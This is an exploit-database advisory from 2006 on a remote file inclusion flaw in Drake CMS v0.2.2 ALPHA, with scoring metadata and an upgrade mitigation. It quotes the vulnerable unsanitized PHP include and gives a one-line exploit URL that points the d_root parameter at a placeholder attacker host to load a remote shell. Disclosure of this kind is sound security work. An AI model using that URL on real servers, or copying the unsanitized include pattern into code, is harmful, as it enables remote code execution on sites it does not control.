Coding 4 Fun (c4f.pl)

vendor:

Drake CMS

by:

GregStar

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Drake CMS

Affected Version From: v0.2.2 ALPHA rev.846

Affected Version To: v0.2.2 ALPHA rev.846

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

A remote file inclusion vulnerability exists in Drake CMS v0.2.2 ALPHA rev.846, which allows an attacker to include a remote file via the 'd_root' parameter in the 'includes/xhtml.php' script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Drake CMS.

Source

Exploit-DB raw data:

**********************************************************************************************************
                                                              
			                Coding 4 Fun (c4f.pl) 
			                                      
**********************************************************************************************************

* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ; 

* Class = Remote File Inclusion ;
 
* Download = https://sourceforge.net/project/showfiles.php?group_id=166901&package_id=192077&release_id=420102 ;

* Found by = GregStar (gregstar[at]c4f[dot]pl) ;

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code in "includes/xhtml.php" :

 	include $d_root.'classes/kses.php';

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

	http://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,kw@ch and for all friends.

**************************************************************************************************************

# milw0rm.com [2006-11-04]